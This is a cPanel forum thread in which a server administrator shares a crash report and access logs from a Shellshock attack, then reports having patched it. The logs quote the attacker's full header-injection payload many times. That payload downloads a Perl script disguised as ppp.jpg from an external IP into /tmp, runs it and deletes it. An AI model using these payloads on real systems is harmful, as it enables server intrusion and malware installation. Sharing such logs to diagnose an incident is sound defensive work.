Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Whm - Cpanel script security folder tmp.

Discussion in 'Security' started by Morri Luca, Apr 7, 2015.

  1. Morri Luca

    Morri Luca Member

    Joined:
    Mar 19, 2015
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italia
    cPanel Access Level:
    Root Administrator
    Hello. this morning my server is down and i received this email from my server :

    (XXXXX = my user server)

    Object : [abrt] full crash report
    Code:
    abrt_version:   2.0.8
    cmdline:        /bin/sh php4
    executable:     /bin/bash
    kernel:         2.6.32-220.13.1.el6.x86_64
    pid:            19131
    pwd:            /usr/local/cpanel/cgi-sys
    reason:         Process /bin/bash was killed by signal 11 (SIGSEGV)
    time:           Tue 07 Apr 2015 04:10:02 AM CEST
    uid:            507
    username:      XXXXXX
    
    sosreport.tar.xz: Binary file, 1777664 bytes
    
    environ:
    :PATH=/usr/local/bin:/usr/bin:/bin
    :HTTP_HOST=XXXXXX.COM
    :HTTP_CONNECTION=keep-alive
    :HTTP_CACHE_CONTROL=max-age=0
    :HTTP_USER_AGENT
    :'() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :'HTTP_COOKIE=() { :;}; /bin/bash -c \"echo xxxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :'HTTP_REFERER=() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    :HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8
    :SERVER_SIGNATURE=
    :'SERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4'
    :SERVER_NAME=xxxxxx.com
    :SERVER_ADDR=myip
    :SERVER_PORT=80
    :REMOTE_ADDR=62.149.164.193
    :DOCUMENT_ROOT=/home/xxxxxxx/public_html
    :SERVER_ADMIN=webmaster@xxxxxxx.com
    :SCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php4
    :REMOTE_PORT=51684
    :GATEWAY_INTERFACE=CGI/1.1
    :SERVER_PROTOCOL=HTTP/1.1
    :REQUEST_METHOD=GET
    :QUERY_STRING=
    :REQUEST_URI=/cgi-sys/php4
    :SCRIPT_NAME=/cgi-sys/php4
    
    limits:
    :Limit                     Soft Limit           Hard Limit           Units    
    :Max cpu time              unlimited            unlimited            seconds  
    :Max file size             unlimited            unlimited            bytes    
    :Max data size             unlimited            unlimited            bytes    
    :Max stack size            10485760             unlimited            bytes    
    :Max core file size        0                    unlimited            bytes    
    :Max resident set          unlimited            unlimited            bytes    
    :Max processes             62776                62776                processes
    :Max open files            16384                16384                files    
    :Max locked memory         65536                65536                bytes    
    :Max address space         unlimited            unlimited            bytes    
    :Max file locks            unlimited            unlimited            locks    
    :Max pending signals       62776                62776                signals  
    :Max msgqueue size         819200               819200               bytes    
    :Max nice priority         0                    0                   
    :Max realtime priority     0                    0                   
    :Max realtime timeout      unlimited            unlimited            us       
    
    maps:
    :00400000-004d4000 r-xp 00000000 fd:00 3407921                            /bin/bash
    :006d3000-006dd000 rw-p 000d3000 fd:00 3407921                            /bin/bash
    :006dd000-006e2000 rw-p 00000000 00:00 0
    :008dc000-008e5000 rw-p 000dc000 fd:00 3407921                            /bin/bash
    :0210e000-0212f000 rw-p 00000000 00:00 0                                  [heap]
    :333d800000-333d820000 r-xp 00000000 fd:00 655418                         /lib64/ld-2.12.so
    :333da1f000-333da20000 r--p 0001f000 fd:00 655418                         /lib64/ld-2.12.so
    :333da20000-333da21000 rw-p 00020000 fd:00 655418                         /lib64/ld-2.12.so
    :333da21000-333da22000 rw-p 00000000 00:00 0
    :333dc00000-333dd89000 r-xp 00000000 fd:00 655456                         /lib64/libc-2.12.so
    :333dd89000-333df88000 ---p 00189000 fd:00 655456                         /lib64/libc-2.12.so
    :333df88000-333df8c000 r--p 00188000 fd:00 655456                         /lib64/libc-2.12.so
    :333df8c000-333df8d000 rw-p 0018c000 fd:00 655456                         /lib64/libc-2.12.so
    :333df8d000-333df92000 rw-p 00000000 00:00 0
    :333e400000-333e402000 r-xp 00000000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e402000-333e602000 ---p 00002000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e602000-333e603000 r--p 00002000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e603000-333e604000 rw-p 00003000 fd:00 655645                         /lib64/libdl-2.12.so
    :3340c00000-3340c1d000 r-xp 00000000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :3340c1d000-3340e1d000 ---p 0001d000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :3340e1d000-3340e21000 rw-p 0001d000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :7fdfa080b000-7fdfa080e000 rw-p 00000000 00:00 0
    :7fdfa0820000-7fdfa0821000 rw-p 00000000 00:00 0
    :7fffc1456000-7fffc146b000 rw-p 00000000 00:00 0                          [stack]
    :7fffc1550000-7fffc1551000 r-xp 00000000 00:00 0                          [vdso]
    :ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
    
    open_fds:
    :0:pipe:[121610173]
    :pos:    0
    :flags:    00
    :1:pipe:[121610174]
    :pos:    0
    :flags:    01
    :2:pipe:[121610175]
    :pos:    0
    :flags:    01
    
    After i had restar server and into file /home/xxxx/access-logs/xxxxx.com i found this Request
    Code:
    62.149.164.193 - - [07/Apr/2015:04:08:07 +0200] "GET /cgi-sys/php4 HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    62.149.164.193 - - [07/Apr/2015:04:07:43 +0200] "GET /cgi-bin/test-cgi HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    62.149.164.193 - - [07/Apr/2015:04:07:19 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    Then i fount file ppp.jpg into my tmp folder.
    I removed all.
    Do I prevent this malware? How can i do? Thank
     
  2. Morri Luca

    Morri Luca Member

    Joined:
    Mar 19, 2015
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italia
    cPanel Access Level:
    Root Administrator
    Hello. I find the problem. This attack is call Shellshock.

    I solved the problem and fix the system Bug.

    ausweb.com.au/tutorials/2014/09/26/check-linux-server-vulnerable-shellshock/
     
    #2 Morri Luca, Apr 8, 2015
    Last edited by a moderator: Apr 8, 2015
  3. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    44,323
    Likes Received:
    1,851
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice